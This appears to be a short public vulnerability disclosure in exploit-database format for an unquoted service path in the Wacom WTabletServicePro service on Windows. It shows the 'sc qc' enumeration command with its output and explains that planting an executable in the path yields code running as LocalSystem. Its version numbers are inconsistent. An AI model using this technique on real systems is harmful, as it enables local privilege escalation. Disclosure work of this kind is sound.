# Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
# Discovery by: Marcos Antonio León (psk)
# Discovery Date: 2019-11-04
# Vendor Homepage: https://www.wacom.com
# Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe
# Tested Version: 6.3.7.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 es

# Step to discover Unquoted Service Path:

C:\>sc qc WTabletServicePro
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WTabletServicePro
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
        GRUPO_ORDEN_CARGA  : PlugPlay
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Wacom Professional Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt would require the local attacker must insert an
executable file in the path of the service. Upon service restart or
system reboot, the malicious code will be run with elevated
privileges.